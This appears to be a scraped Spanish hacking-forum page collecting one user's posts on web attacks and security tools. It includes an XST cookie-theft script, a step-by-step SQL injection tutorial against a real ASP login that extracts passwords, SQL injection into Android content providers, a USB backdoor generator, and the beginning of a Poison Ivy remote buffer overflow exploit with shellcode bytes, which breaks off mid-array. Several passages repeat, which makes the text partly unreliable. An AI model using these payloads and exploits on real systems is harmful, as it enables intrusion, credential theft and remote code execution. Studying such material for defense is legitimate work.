@stakewinner00:
Recuerda que la base de datos almacenara los resultados de análicis.
Recuerda que la base de datos almacenara los resultados de análicis.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#182
Bugs y Exploits / Cross Site Tracing (XST)
Abril 02, 2013, 09:11:40 PM.jpg)
Cross Site Tracing - XST es una vulnerabilidad que se deriva de XSS y es generada por el método HTTP TRACE que muestra las cookies que el navegador tiene para el dominio.
El método TRACE se utiliza principalmente para fines de depuración, pero Jeremiah Grossman descubrió en 2003 que se puede llegar a montar un ataque, que es conocido como XST.
El método HTTP TRACE. Este método se utiliza/ba para debugging de los servidores Web y viene activado por defecto en muchos servers. Lo único que hace es repetir toda información enviada por el cliente al server, es algo así como un echo. Un ejemplo del método Trace sería como sigue:
$ nc 192.168.1.1 80 -vvv
TRACE / HTTP/1.1
Host: prueba
User-Agent: prueba
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 07 Dec 2009 17:07:16 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 50
TRACE / HTTP/1.1
Host: prueba
User-Agent: prueba
Como se observa, el servidor responde exactamente lo mismo que le enviamos en el pedido. La parte útil para el ataque, es que si armamos un pedido HTTP TRACE desde el browser a una página en la cual se utilizan cookies, el servidor nos responderá copiando las cookies de regreso. Por ejemplo, podríamos obtener el siguiente comportamiento:
$ nc 192.168.1.1 80 -vvv
TRACE / HTTP/1.1
Host: prueba
Cookie: SID=13klj12jhlkjhdf09kasdn
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 07 Dec 2009 17:15:26 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 73
TRACE / HTTP/1.1
Host: prueba
Cookie: SID=13klj12jhlkjhdf09kasdnSi podemos obtener la cookie enviada por el browser a través de XSS, para qué necesitamos el método TRACE? bueno resulta ser que hay casos en los que no es posible obtener las cookies utilizando Javascript (u otro lenguaje script ejecutado en el browser).
En browsers como IE6 SP1 y posteriores o Firefox 2.0.0.5 y posteriores, existe una opción de seguridad llamada HttpOnly cookies. Cuando un servidor web envía el parámetro HttpOnly dentro de las cookies, el browser no debería permitir que las cookies sean accesibles utilizando scripts como Javascript. Esto es, si la opción HttpOnly está activada, una llamada a document.cookie nos devolverá vacío, aún cuando existan cookies. Utilizando esta propiedad se previene el robo de cookies explotando vulnerabilidades XSS, lo cual es muy bueno.
Aca es donde entra en juego el XST. A través de XST se pueden obtener cookies aún cuando está activada la característica HttpOnly. Si armamos un pedido HTTP TRACE desde el browser, éste incorporará la cookie como parte del header (la cual todavía no podemos acceder). Ahora, cuando el servidor responda al pedido TRACE, éste incluirá la cookie como parte de la respuesta....
Cómo es posible armar un pedido HTTP TRACE utilizando Javascript? distintos browsers tienen distintos métodos. Para ejemplificar, les dejo los métodos usados por los dos browsers más conocidos, IE y Firefox.
Una forma de realizar este trabajo en Internet Explorer es utilizando el control ActiveX XMLHTTP. Un ejemplo de cómo utilizar esto para obtener cookies es el siguiente (tomado del paper CROSS-SITE TRACING (XST) de Jeremiah Grossman):
<script type=""text/javascript"">
<!–
function sendTrace () {
var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
xmlHttp.open("TRACE", "http://foo.bar",false);
xmlHttp.send();
xmlDoc=xmlHttp.responseText;
alert(xmlDoc);
}
//–>
</script>
<input onclick=""sendTrace();"" request="" trace="" type="BUTTON" value=""Send" />En firefox la función a utilizar es muy similar:
<script type="text/javascript">
<!–
function sendTrace()
{
xhttp=new XMLHttpRequest();
xhttp.open("TRACE", "http://foo.bar",false);
xhttp.send();
xmlDoc=xhttp.responseXML;
alert(xmlDoc);
}
//–>
</script>
<INPUT TYPE=BUTTON onclick="sendTrace();" VALUE="Send Trace Request">El uso de estas funciones tienen una restricción: no permiten al browser conectarse a otro dominio que no sea el de la página que está mostrando. Pero esto igualmente no es problema para realizar el ataque.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#183
Python / Volatility Framework
Marzo 29, 2013, 10:23:48 PM
Volatility es un Framework con un conjunto de herramientas desarrolladas enteramente en Python con licencia GNU. Este Framework esta pensado para extraer de una imagen de un disco los datos volátiles que estaban en memoria RAM. Estas técnicas de extracción las podemos utilizar Windows y/o Linux.
Entre las características podemos mencionar las siguientes:
- Tipo de sistema, fecha y hora
- Procesos que se estaban ejecutando
- Puertos abiertos
- Puertos conectados
- DLLs cargadas por proceso
- Ficheros cargados por procesos
- Claves del registro utilizadas en los procesos
- Modulos del Kernell
- Mapa fisico de offsets a direcciones virtuales
- Direccionamiento de memoria por proceso
- Extración de ejecutables
La mayoría de plugins han sido desarrollados por Brendan Dolan (aka moyix) y pueden encontrarse, junto con una referencia al mensaje de su blog en el que realiza una pequeña introducción al uso y características del mismo, en la siguiente dirección:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Otra gran fuente de información con una recopilación de los plugins disponibles así como una breve descripción de la funcionalidad ofrecida por cada uno de ellos la podemos encontrar en:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Instalación de Volatility
Código: text
Ahora desempaquetamos el contenido e incluiremos un enlace simbólico al directorio obtenido, de forma que siempre apunte a la ultima versión del framework que tengamos instalada:
Código: text
Entre las características podemos mencionar las siguientes:
- Tipo de sistema, fecha y hora
- Procesos que se estaban ejecutando
- Puertos abiertos
- Puertos conectados
- DLLs cargadas por proceso
- Ficheros cargados por procesos
- Claves del registro utilizadas en los procesos
- Modulos del Kernell
- Mapa fisico de offsets a direcciones virtuales
- Direccionamiento de memoria por proceso
- Extración de ejecutables
La mayoría de plugins han sido desarrollados por Brendan Dolan (aka moyix) y pueden encontrarse, junto con una referencia al mensaje de su blog en el que realiza una pequeña introducción al uso y características del mismo, en la siguiente dirección:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Otra gran fuente de información con una recopilación de los plugins disponibles así como una breve descripción de la funcionalidad ofrecida por cada uno de ellos la podemos encontrar en:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Instalación de Volatility
:~$ cd /usr/local
:~$ wget https://www.volatilesystems.com/volatility/1.3/Volatility-1.3_Beta.tar.gzAhora desempaquetamos el contenido e incluiremos un enlace simbólico al directorio obtenido, de forma que siempre apunte a la ultima versión del framework que tengamos instalada:
:~$ tar xvzf Volatility-1.3_Beta.tar.gz
:~$ rm -f Volatility-1.3_Beta.tar.gz
:~$ ln -s Volatility-1.3_Beta/ volatility #184
Bugs y Exploits / Inyección SQL a Login ASP
Marzo 10, 2013, 11:13:28 PM
Bien comencemos, para este tutorial utizare la página de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Este tutorial es con fines educativos y no me hago responsable del uso que le den.
En el en campo "Clave de Acceso" y "Password" del login escribimos:
' having 1= 1--
Al hacerlo nos dara el seguiente error:
Sabemos que es vulnerable y nos acaba de dar el nombre de la tabla y la columna "Usuario.Clave, teniendo esto regresamos a nuestro login y escribimos:
' group by Usuario.Clave having 1 = 1--Hacemos la inyección y el siguiente error sera así:
Nos acaba de dar el nombre de la tabla y la columna "Usuario.Nombre", teniendo esto regresamos a nuestro login y escribimos:
' group by Usuario.Clave, Usuario.Nombre having 1=1--Hacemos la inyección y el siguiente error sera así:
Nos acaba de dar el nombre de la tabla y la columna "Usuario.Clave_de_Acceso", teniendo esto regresamos a nuestro login y escribimos:
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso having 1=1--Hacemos la inyección y el siguiente error sera así:
Nos acaba de dar el nombre de la tabla y la columna "Usuario.Password", teniendo esto regresamos a nuestro login y escribimos:
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password having 1=1--Hacemos la inyección y el siguiente error sera así:
Nos acaba de dar el nombre de la tabla y la columna "Usuario.Tipo_de_Usuario", teniendo esto regresamos a nuestro login y escribimos:
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario having 1=1--Hacemos la inyección y el siguiente error sera así:
Nos acaba de dar el nombre de la tabla y la columna "Usuario.Tunto_de_Captura", teniendo esto regresamos a nuestro login y escribimos:
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario, Usuario.Punto_de_Captura having 1=1--
Hacemos la inyección y el siguiente error sera así:
Nos acaba de dar el nombre de la tabla y la columna "Usuario.ESTATUS", teniendo esto regresamos a nuestro login y escribimos:
' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario, Usuario.Punto_de_Captura, Usuario.ESTATUS having 1=1--Como podemos observar al hacer esto nos dira "clave de acceso y/o password incorrectos" esto quiere decir que hemos terminado de buscar las tablas y columnas.
Nuestra siguiente inyección sera de esta forma:
' union select 1,1,1,1,1,1,min(Clave_de_Acceso) from Usuario where Clave_de_Acceso > 'a'--Esta parte tenemos 6 unos y min(LOGIN) es la posición al hacer la inyección les arroja los datos.
La posión de los unos puede varia un ejemplo podría ser:
' union select 1,1,1,1,min(Clave_de_Acceso)1,1 from Usuario where Clave_de_Acceso > 'a'--
Curiosamente al hacer la inyección de esta forma tenemos el acceso:
' union select 1,1,1,1,1,1,min(Password) from Usuario where Clave_de_Acceso > 'ADMIN'--
La inyección para que les arroje la password es:
' union select 1,1,1,1,1,1,min(Password) from Usuario where Password > 'ADMIN'--
#185
USBsploit es una prueba de concepto que genera puertas traseras "reverse_tcp" (x86, x64, todos los puertos) y archivos maliciosos LNK (accesos directos). USBsploit trabaja a través de sesiones Meterpreter, es una versión modificada de Metasploit. La interfaz es un mod de SET (Social Engineer Toolkit).
Características
Crear un Backdoor.
Crear un LNK y un autorun.inf.
Crear un PDF y un autorun.inf.
Crear un Backdoor y lanzar un oyente multi-controlador para el ataque de descarga USB.
Crear una puerta trasera, un autorun.inf y lanzar un oyente multi-controlador para el Auto USB [run | play] / EXE infección.
Crear un Backdoor, LNK a, un autorun.inf y lanzar un oyente multi-controlador de la Auto USB [run | play] / LNK infección.
Crear una puerta trasera, un PDF, un autorun.inf y lanzar un oyente multi-controlador de la Auto USB [run | play] infección / PDF.
Crear una puerta trasera, un autorun.inf y lanzar un oyente multi-controlador para el Auto USB [run | play] / EXE infección y el ataque de descarga USB.
Crear un Backdoor, LNK a, un autorun.inf y lanzar un oyente multi-controlador para el Auto USB [run | play] / LNK infección y el ataque de descarga USB.
Crear una puerta trasera, un PDF, un autorun.inf y lanzar un oyente multi-controlador para el Auto USB [run | play] infección / PDF y el ataque de descarga USB.
Crear un Backdoor, LNK un PDF y un archivo. Vuelva a colocar todos los archivos EXE, PDF LNK y por los maliciosos generados o costumbres, si es posible.
Lanzamiento de un oyente LNK (sin infección directa USB aquí) para obtener una conexión de vuelta de la unidades USB infectadas con el archivo LNK pasado generó.
Entre Otras.
Instalacion Ubuntu
Descargan el archivo, en mi caso será (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login) y lo extraen.
Se nos creara una carpeta llamada usbsploit y nos dirigiremos hacia ella mediante el terminal.
Una ves dentro de la carpeta usbsploit le daremos permisos de ejecucion con el siguiente comando ( chmod +x You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login ).
Instalamos la tool de la siguiente forma ( ./installer.sh ).
Se nos instalara la tool automaticamente y borraremos la carpeta usbsploit que si miramos dentro nos quedo vacia ya que al instalarlo los archivos se movieron de sitio.
Cerramos todo y abrimos un nuevo terminal y escribiremos usbsploit y la tool se iniciara automaticamente
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#186
Android / OWASP GoatDroid
Febrero 24, 2013, 10:36:39 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login es un proyecto que ayudará a educar en materia de seguridad a los desarrolladores de aplicaciones Android.
Se trata de un entorno completamente funcional para aprender acerca de las vulnerabilidades y los fallos de seguridad en la extendida plataforma. El framework y la aplicación están basadas completamente en Java. No es necesario instalar un servidor web externo o un contenedor, aunque si necesitaremos MySQL, el SDK de Android y Eclipse. Cada servicio web corre en instancias Jetty embebidas y utiliza la implementación Jersey de JAX-RS.
Instalación:
1. Como comentábamos, es necesario tener previamente instalado Mysql, JDK, Eclipse y Android SDK.
2. Lo primero que haremos es crear un dispositivo virtual con un nivel 7 de API como mínimo.
3. Después importamos la base de datos FourGoats en MySQL: 'mysql -u username -p < fourgoats.sql'. El fichero fourgoats.sql está dentro del directorio /databases de la carpeta GoatDroid.
4. Dentro de MySQL ejecutamos: 'create user 'goatboy'@'localhost' identified by 'goatdroid'' (si queremos indicar otra contraseña tendremos que cambiarla en el código fuente de goatdroid.jar y re-exportar.
5. En MySQL, ejecutamos : 'grant insert, delete, update, select on fourgoats.* to goatboy@localhost'
6. Ahora que la base de datos está configurada con las tablas y los datos de ejemplo, arrancamos goatdroid.jar haciendo clic o ejecutamos 'java -jar goatdroid.jar'
7. En el menú seleccionamos 'Configure y Edit' y añadimos las rutas de Eclipse y del SDK y los dispositivos virtuales:
8. Desplegamos la carpeta FourGoats en Apps, seleccionamos v1 y pulsamos el botón 'Iniciar servicio web':
9. Pulsamos el botón para iniciar el emulador y seleccionamos nuestro dispositivo virtual:
10. Una vez arrancado el dispositivo virtual, instalamos la aplicación pulsando el botón "Push App To Device". En caso de que fallara, podemos instalar el apk nosotros directamente: 'D:\Android\android-sdk\platform-tools>adb.exe install "d:\OWASP GoatDroid v0.1.2 BETA\goatdroid_apps\FourGoats\v1\android_app\FourGoats- Android Application.apk"'
11. Pinchamos en el icono creado para iniciar la aplicación y, antes de empezar a hacer nada, es necesario especificar el host y el puerto para conectarnos al servicio web. Para ello, pulsamo el botón 'Menú' y seleccionamos "Destination Info".
12. Por último, registramos y creamos una cuenta y nos loggeamos.
Se pueden descubrir vulnerabilidades de tipo:
Client-Side Injection
Server-Side
Authorization Issues
Side Channel Information Leakage
Insecure
Data Storage
Privacy Concerns
#187
Ingeniería Inversa / Re:Que se Necesita para la Ingeniería Inversa
Febrero 23, 2013, 09:21:32 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Se te agradese, tuve la aportunidad de leerlos hace un tiempo muy bien explicados espero que continues con los cursos.
Saludos.
PD: Un gusto tenerte en el foro espero que aportes mucho.
#188
Android / Re:Mercury: Auditoria de aplicaciones Android
Febrero 23, 2013, 09:04:10 PM
Una de las herramientas que más nos llamaron la atención de la BlackHat Europe la que presentó Tyrone Erasmus en su ponencia 'The Heavy Metal That Poisoned the Droid' (whitepaper y slides).
Se llama Mercury de MWR Labs y es un framework gratuito que ayudará a los "cazadores" de bugs a encontrar vulnerabilidades, escribir exploits PoC y, en definitiva, a jugar con Android.
Se trata de una herramienta que nos permitirá examinar de forma dinámica y a explotar las posibilidades de ataque de las aplicaciones que residen en un dispositivo Android. Se divide en dos partes: una aplicación servidor que requiere pocos privilegios y se instala en el teléfono y un cliente escrito en Python para interactuar con el servidor desde la línea de comandos.
Características
El principal objetivo de Mercury es ser una herramienta de auditoría que pueda utilizarse con muchos propósitos. Algunas de sus características nos permitirán:
- Encontrar más fácilmente información relevante acerca de los vectores de ataque de una aplicación
- Interactuar con los 4 endpoints IPC (actividades, broadcast receivers, proveedores de contenido y servicios) de una aplicación desde la línea de comandos con el fin de encontrar vulnerabilidades
- Jugar con el sistema operativo Linux desde el punto de vista de una aplicación sin privilegios (sorprende lo mucho que se pueden ver)
- Encontrar información sobre los paquetes instalados con filtros de búsqueda opcionales que permiten un mejor control
- Subir y bajar ficheros sin usar ADB (¡esto incluye poder hacerlo a través de Internet también!)
- Escribir nuevos módulos con exploits para las vulnerabilidades encontradas por medio de una rango de comandos
predefinidos, y utilizar los módulos que otros hayan creado
Requisitos previos
- Teléfono o emulador con Android 2.2 o superior
- PC con Linux y Python 2.7 – (el autocompletar de comandos no funciona en Windows)
Instalación
- Descarga el zip desde aquí You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
- Instala el servicio server/mercury.apk en el teléfono e inícialo:
- Arranca el cliente client/mercury.py en el PC
Citar./mercury.py
- Conecta con el servidor Mercury:
Si tenemos conectado el teléfono al PC por USB o estamos usando un emulador, necesitaremos redireccionar el puerto 31415 (puedes hacerlo con el comando 'adb forward tcp:31415 tcp:31415')
Si nos vamos a conectar al teléfono por la red inalámbrica, necesitaremos obtener la IP del teléfono, en nuestro caso la 192.168.1.35
- Escribimos en el cliente "connect" seguido de la dirección IP del teléfono (127.0.0.1 si utilizamos un emulador o lo tenemos conectado por USB al PC)
mercury: connect 192.168.1.35Commands - type help for more info
--------------------------------------------
activity broadcast help packages service tools
back debuggable modules provider shellEmpezando a jugar con Mercury
Cuando buscamos fugas de información en un dispositivo Android, los proveedores de contenido exportados son un buen comienzo. Dentro de la sección 'provider', con 'info -p null' obtendremos un listado de todos estos proveedores y sólo tendremos que ver aquellos que no requieran permisos para leerlos (Required Permission - Read: null o Required Permission - Write: null).
El desarrollador de una aplicación tiene que configurar específicamente 'android:readPermission' o 'android:permission' en el proveedor de contenidos dentro del fichero 'AndroidManifest.xml' si no quiere que la información sea accesible por otras aplicaciones del dispositivo. Si no lo hace, a veces no encontraremos información delicada y otras veces encontraremos datos que al desarrollador no le gustaría que leyéramos.
*mercury: provider
*mercury#provider: info -p null
Package name: com.sec.android.app.callsetting
Authority: com.sec.android.app.callsetting.allcalls
Required Permission - Read: null
Required Permission - Write: null
Grant Uri Permissions: false
Multiprocess allowed: falseUna vez que seleccionamos la aplicación objetivo, el siguiente paso será obtener las direcciones de sus contenedores (content URI). Para ello utilizaremos el comando 'finduri':
*mercury#provider: finduri com.sec.android.app.callsetting
/system/app/CallSetting.apk:
Contains no classes.dex
/system/app/CallSetting.odex:
content://com.sec.android.app.callsetting.allcalls/prefix_num
content://com.sec.android.app.callsetting.allcalls/reject_msg
content://com.sec.android.app.callsetting.allcalls/reject_numPara mostrarnos esta información el comando finduri ha tenido que seguir los siguientes pasos para la enumeración:
- Encontrar la localización del fichero APK
- Descomprimir el fichero classes.dex situado dentro del APK (si no lo hubiera, buscaría los ODEX del paquete)
- Emplear código similar al string de UNIX para encontrar todas las cadenas válidas dentro del binario (fichero DEX u ODEX)
- Filtrar la salida final parseando las cadenas con content://.
Ahora que tenemos las direcciones de los contenedores, con query podemos leer su contenido. Por ejemplo:
*mercury#provider: query content://com.sec.android.app.callsetting.allcalls/reject_msg
_id | reject_message | edit_checked
.....
1 | Lo siento, estoy ocupado. LLámame más tarde | 2131165242
2 | Estoy en una reunión | 2131165243
3 | Estoy en clase | 2131165244
4 | Estoy en el cine | 2131165245
5 | Estoy conduciendo | 2131165246E incluso realizar inyecciones SQL:
*mercury#provider> query content://com.sec.android.app.callsetting.allcalls/prefix_num --projection "'"
unrecognized token: "' FROM prefix_num": , while compiling: SELECT ' FROM prefix_num
*mercury#provider> query content://com.sec.android.app.callsetting.allcalls/prefix_num --projection "* FROM SQLITE_MASTER--"
type | name | tbl_name | rootpage | sql
.....
table | android_metadata | android_metadata | 3 | CREATE TABLE android_metadata (locale TEXT)
table | prefix_num | prefix_num | 4 | CREATE TABLE prefix_num (_id INTEGER PRIMARY KEY AUTOINCREMENT, prefix_number TEXT NOT NULL,prefix_checked INTEGER)
table | sqlite_sequence | sqlite_sequence | 5 | CREATE TABLE sqlite_sequence(name,seq)
#189
Presentaciones y cumpleaños / Re:Me presento....
Febrero 17, 2013, 12:01:19 AM
Bienvenido Crod1K!!!
Un gran user, gracias por tus aportes
Saludos.
Un gran user, gracias por tus aportes
Saludos.
#190
Bugs y Exploits / Wfuzz
Febrero 06, 2013, 12:30:57 PM
Wfuzz es una herramienta destinada para la enumeración de archivos y directorios alojados en una aplicación Web.
Esta herramienta desarrollada por Edge-Security realiza ataques de fuerza bruta para la enumeración de directorios, servlets, scripts y archivos en el webserver.
Estos ataques son realizados mediante peticiones GET y POST que además de verificar la existencia de dichos recursos, posibilita la identificación de inyecciones del tipo SQL LDAP y XSS, entre otras.
Uso básico :
python wfuzz.py -c -z file,worldlist/general/common.txt http://www.objetivo.com/FUZZFiltrado básico :
python wfuzz.py -c -z file,worldlist/general/text.txt --hc 404 http://www.objetivo.com/FUZZYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#191
Bugs y Exploits / Wmap Web Scanner Metasploit
Enero 26, 2013, 10:07:47 PM
Wmap es un framework para ejecutar escaneos contra aplicaciones Web, diseñado para ser utilizado como un plugin de MetaSploit Framework, cuenta con una arquitectura simple y no obstante sumamente potente en comparación con otras alternativas open source o comerciales que se encuentran actualmente en el mercado, la simplicidad de este plugin radica en que no depende de ningún navegador web o motor de búsqueda para capturar datos y manipularlos.
Las librerías que se deben instalar antes de proceder con la ejecución del plugin en un sistema Debian/Ubuntu son:
sudo apt-get install libxml-ruby
sudo apt-get install libxml2-dev
sudo apt-get install libxslt-dev
sudo apt-get install libnokogiri-ruby
gem install libxslt-ruby
gem install msgpack
PostgreSQL
Lo primero que haremos será crear una nueva base de datos para almacenar los resultados de análicis.
Luego en una terminal tecleamos lo siguiente:
Luego de haber creado la base de datos abriremos una consola del metasploit y tecleamos.
Donde:
Luego de haber creado la base de datos cargaremos WMAP.
Una vez realizado esto vamos añadir una nueva el target (sitio) seguido de la IP.
Luego comprobramos si fue agregado correctamente.
Luego procedemos a covertirlo a objetivo ( Target )
Luego procedemos a lanzar los módulos de explotacion que serán cargados.
Una vez cargados los módulos procedemos a lanzarlos al sitio de destino para realizar el test de seguridad.
Una vez que toda la exploracion termine vamos a comprobar si encontramos alguna vulnerabilidad.
Las librerías que se deben instalar antes de proceder con la ejecución del plugin en un sistema Debian/Ubuntu son:
sudo apt-get install libxml-ruby
sudo apt-get install libxml2-dev
sudo apt-get install libxslt-dev
sudo apt-get install libnokogiri-ruby
gem install libxslt-ruby
gem install msgpack
PostgreSQL
Lo primero que haremos será crear una nueva base de datos para almacenar los resultados de análicis.
Citarstuxnet@stuxnet:~$ sudo su postgres
[sudo] password for stuxnet:
postgres@stuxnet:/home/stuxnet$ createuser metasploit -P
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) y
postgres@stuxnet:/home/stuxnet$ createdb --owner=metasploit metasploit
Luego en una terminal tecleamos lo siguiente:
Citarsudo /etc/init.d/./postgresql start
Luego de haber creado la base de datos abriremos una consola del metasploit y tecleamos.
Citarmsf > db_connect metasploit:[email protected]:5432/metasploit
Donde:
CitarUser: metasploit ( reemplazar por su user )
Passwd: metasploit ( reemplazar por su password )
Luego de haber creado la base de datos cargaremos WMAP.
Citarmsf > load wmap
Una vez realizado esto vamos añadir una nueva el target (sitio) seguido de la IP.
Citarmsf > wmap_sites -a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,199.59.148.10
Luego comprobramos si fue agregado correctamente.
Citarmsf > wmap_sites -l
Luego procedemos a covertirlo a objetivo ( Target )
Citarmsf > wmap_sites -s 0 1
Citarmsf > wmap_targets -t You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,199.59.148.10
Citarmsf > set DOMIAN You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Citarmsf > wmap_targets -l
Luego procedemos a lanzar los módulos de explotacion que serán cargados.
Citarmsf > msf > wmap_run -t
Una vez cargados los módulos procedemos a lanzarlos al sitio de destino para realizar el test de seguridad.
Citarmsf > wmap_run -e
Una vez que toda la exploracion termine vamos a comprobar si encontramos alguna vulnerabilidad.
Citarmsf > hosts -c address,svcs,vulns
#192
Loki es una impresionante herramienta de manipulación de redes a nivel de capa 2/3 creada por Daniel Mende, René Graf y Enno Rey, Loki provee una interfaz gráfica de usuario (GUI) para realizar múltiples ataques a protocolos, permitiéndonos manipular protocolos de red para realizar ataques MITM (Man-In-The-Middle) y otras actividades maliciosas. Los protocolos soportados son:
Citar
ARP
HSRP, HSRPv2
RIP
BGP
OSPF
EIGRP
WLCCP
VRRP, VRRPv3
BFD (Protocolo de Reenvio Bidireccional)
LDP (Protocolo de Diustribución de Etiquetas)
MPLS (re-etiquetado, interfaz de tunel)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Videos: Funte: Un Informático en el Lado del Mal
#193
Hacking / Onapsis Bizploit – ERP Penetration Testing Framework
Enero 20, 2013, 11:41:27 PM
Bizploit es el primer marco de pruebas de penetración de ERP Opensource. Desarrollado por los laboratorios de investigación Onapsis, Bizploit ayuda a los profesionales de la seguridad en el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, exploración, fases de evaluación y explotación de la vulnerabilidad de pruebas de penetración de ERP especializado.
Actualmente, Bizploit viene con muchos plugins para evaluar la seguridad de plataformas de negocios SAP. Plugins para otros ERPs populares se incluirán en el corto plazo.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#194
Bugs y Exploits / Poison Ivy 2.3.2 Remote Buffer Overflow
Enero 20, 2013, 11:17:52 PM
# Exploit Title: Poison Ivy 2.3.2 (Latest version) remote buffer overflow
# Google Dork: No dorks.
# Date: 27/05/11
# Author: Kevin R.V <[email protected]>
# Software Link: http://www.poisonivy-rat.com/dl.php?file=PI232
# Version: 2.3.2
# Tested on: Windows XP SP2
# CVE : No exist.
/* Poison Ivy 2.3.2 Remote Buffer Overflow
* Author: Kevin R.V <[email protected]>
* Date: 2011
* License: Totally free
* */
#include <iostream>
#include <winsock2.h>
#define VERS "0.1"
int connected;
using namespace std;
char payload[] = {
0xb2, 0xa8, 0xc3, 0x17, 0x1c, 0x1b, 0x99, 0xb9,
0x4c, 0xab, 0x8b, 0x88, 0x3a, 0x20, 0x13, 0xb3,
0x72, 0x0e, 0x57, 0xbc, 0x9f, 0x81, 0xb9, 0x08,
0x61, 0x30, 0x87, 0x74, 0xea, 0x65, 0xb5, 0x4a,
0xc9, 0xfc, 0x87, 0xe3, 0x95, 0x9e, 0xcd, 0xcd,
0x40, 0x98, 0xd2, 0x1f, 0x31, 0xee, 0x96, 0x83,
0x3d, 0x0a, 0xfe, 0xb8, 0x9b, 0xf2, 0xe7, 0x10,
0x23, 0x64, 0xfe, 0xe9, 0x10, 0xc4, 0x9c, 0xf7,
0x29, 0xe5, 0x6b, 0xe3, 0x54, 0xbb, 0x18, 0x8b,
0x07, 0x81, 0x92, 0x5e, 0xbb, 0x35, 0x6f, 0xe4,
0x23, 0x4a, 0x0c, 0xd0, 0x1f, 0x3b, 0xd4, 0x9a,
0x5c, 0x94, 0xad, 0x8b, 0xed, 0xa4, 0xed, 0xb2,
0x14, 0x23, 0x04, 0xa5, 0xfd, 0x8e, 0x8c, 0x9b,
0xc8, 0x0f, 0x78, 0xbf, 0xf2, 0xe4, 0xfe, 0x28,
0xe9, 0x3c, 0x5d, 0x86, 0x16, 0xff, 0x59, 0x7d,
0x70, 0x6d, 0x18, 0x2d, 0xdf, 0x28, 0x66, 0x02,
0xde, 0xca, 0x20, 0xe6, 0xfd, 0xe7, 0xbf, 0x4d,
0xe8, 0x8c, 0x69, 0xdd, 0x40, 0x22, 0x8f, 0x2f,
0x55, 0x54, 0xb1, 0x60, 0x86, 0x29, 0xd0, 0x3d,
0xc7, 0x01, 0xb5, 0xdc, 0xbf, 0x63, 0x28, 0xd2,
0x4e, 0xe6, 0x29, 0xed, 0x5c, 0xee, 0x17, 0x53,
0xe1, 0x11, 0x5c, 0x61, 0x9b, 0xb0, 0xfc, 0x71,
0x6e, 0x46, 0xa9, 0x27, 0xa8, 0x21, 0x05, 0x67,
0x86, 0x24, 0x86, 0x01, 0xb8, 0xd7, 0x65, 0x11,
0x36, 0xe5, 0x16, 0x05, 0xdc, 0x8c, 0x7c, 0xa7,
0xb9, 0xee, 0xbe, 0xa6, 0xcf, 0x88, 0x67, 0x56,
0xaa, 0x61, 0xe3, 0x2c, 0x72, 0xbf, 0x5b, 0xee,
0x18, 0xc4, 0x65, 0x2c, 0x4a, 0x0d, 0x88, 0x2e,
0xad, 0x96, 0x67, 0xab, 0xc1, 0xb1, 0x95, 0x03,
0x36, 0xc8, 0x04, 0xbf, 0xe8, 0x29, 0x5a, 0xf5,
0x83, 0xe5, 0x5f, 0xe4, 0x0e, 0xe2, 0x6f, 0x6b,
0x93, 0x80, 0xe7, 0x25, 0xca, 0x44, 0xa8, 0x48 };
char payload2[] = {
0xc6, 0xa7, 0x53, 0xce, 0xdc, 0x1c, 0xdc, 0x74,
0x9a, 0xc7, 0x31, 0xdf, 0x2a, 0x21, 0x5f, 0x0e,
0x7e, 0xe6, 0x1e, 0xa1, 0xb5, 0x17, 0xc4, 0x9f,
0x4a, 0x7a, 0x81, 0xde, 0x90, 0x13, 0x37, 0x2d,
0x62, 0x3c, 0xb6, 0x10, 0x2d, 0x44, 0x57, 0xa2,
0xa0, 0xdd, 0xcb, 0x90, 0xd3, 0x83, 0x1a, 0xda,
0x89, 0x97, 0x68, 0x61, 0xce, 0x38, 0xc1, 0xc4,
0xe8, 0xb0, 0xfa, 0x0b, 0x64, 0x12, 0x73, 0xf0,
0x28, 0x24, 0x2b, 0x51, 0x78, 0x15, 0xfa, 0x27,
